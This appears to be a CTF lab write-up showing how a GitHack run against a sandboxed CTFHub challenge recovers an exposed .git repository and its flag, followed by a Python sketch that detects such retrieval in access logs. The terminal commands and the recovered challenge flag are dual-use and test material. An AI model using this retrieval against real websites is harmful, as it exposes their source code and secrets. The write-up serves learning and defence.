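Many developers today use git for version control and to deploy sites automatically. If this is misconfigured, the .git folder may be deployed straight to the production environment, which results in a git leak vulnerability. Try to solve this challenge using BugScanTeam's GitHack.
Step 1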
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python2 GitHack.py http://challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com:10800/.git
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com:10800/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/root/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800'...
fatal: 仓库 'http://challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com:10800/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com:10800/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示: git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main'、'trunk' 和 'development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示: git branch -m <name>
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/dd/99d7645add1d9deea9131de63abf71b6fea090
[*] objects/20/ed8edd5b2b6b740a88558c9831785aa2a40d20
[*] objects/41/fd37be56e0df54d1c8148445d51f95bfbb0d2e
[*] objects/01/2ae1fc6b838a345b689ae6bb4ec0edfd517a64
[*] objects/90/71e0a24f654c88aa97a2273ca595e301b7ada5
[*] objects/ef/26e55277dadb891fc546e3055d8e065db0c8fe
[*] objects/2c/59e3024e3bc350976778204928a21d9ff42d01
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /root/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800
Step 2
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# ls
data dist GitHack.py lib LICENSE README.md
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# cd dist
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist]
└─# ls
challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist]
└─# cd challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800
Step 3
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800]
└─# ls
50x.html 6949130029149.txt index.html
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800]
└─# cat index.html
<html>
<head>
<meta charset="UTF-8" />
<title>CTFHub .git leakage</title>
</head>
<body>
<h1>Where is flag?</h1>
</body>
</html>
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800]
└─# cat 6949130029149.txt
ctfhub{406e5a271b8619971ec28b3d}
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800]
└─#
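On the server side, the retrieval shown in Step 1 leaves a recognizable trail in the web access log: successful requests for .git metadata files followed by loose object paths. The following detection sketch is an added example, not part of the original write-up or of GitHack; the Combined Log Format input, the function name `summarize_git_access`, and all sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed input: access logs in Combined Log Format (client, request, status).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) [^"]*" (\d{3}) ')
# Loose object path, as in the tool output above: objects/<2 hex>/<38 hex>.
OBJECT_RE = re.compile(r'^objects/[0-9a-f]{2}/[0-9a-f]{38}$')
# Metadata files listed under "Cache files" in the tool output above.
META = {"HEAD", "config", "index", "packed-refs", "ORIG_HEAD", "FETCH_HEAD",
        "COMMIT_EDITMSG", "logs/HEAD"}

def summarize_git_access(lines):
    """Per client: which .git files were served (HTTP 200) and how many objects."""
    hits = defaultdict(lambda: {"meta": set(), "objects": 0, "exposed": False})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.group(1), m.group(2).split("?", 1)[0], int(m.group(3))
        if "/.git/" not in path:
            continue
        entry = hits[ip]                      # record the probe even if it was denied
        name = path.split("/.git/", 1)[1]
        if status != 200:
            continue
        if OBJECT_RE.match(name):
            entry["objects"] += 1
        elif name in META or name.startswith(("refs/", "logs/")):
            entry["meta"].add(name)
        else:
            continue
        entry["exposed"] = True               # repository data left the server
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, made-up object id).
OBJ = "/.git/objects/aa/" + "0" * 38
SAMPLE = [
    f'203.0.113.7 - - [01/Jan/2024:10:00:0{i} +0000] "GET {p} HTTP/1.1" {s} 120 "-" "-"'
    for i, (p, s) in enumerate([("/.git/HEAD", 200), ("/.git/config", 200),
                                ("/.git/index", 200), (OBJ, 200),
                                ("/.git/packed-refs", 404)])
] + ['198.51.100.9 - - [01/Jan/2024:10:05:00 +0000] "GET /.git/HEAD HTTP/1.1" 403 0 "-" "-"',
     '198.51.100.9 - - [01/Jan/2024:10:05:01 +0000] "GET /index.html HTTP/1.1" 200 98 "-" "-"']

if __name__ == "__main__":
    for ip, info in summarize_git_access(SAMPLE).items():
        state = "EXPOSED" if info["exposed"] else "probe only"
        print(ip, state, sorted(info["meta"]), info["objects"])
```

Any client marked as exposed received repository data, so the source history and anything committed to it should be treated as disclosed; a client marked "probe only" was denied, which is the expected result once the web server blocks access to .git.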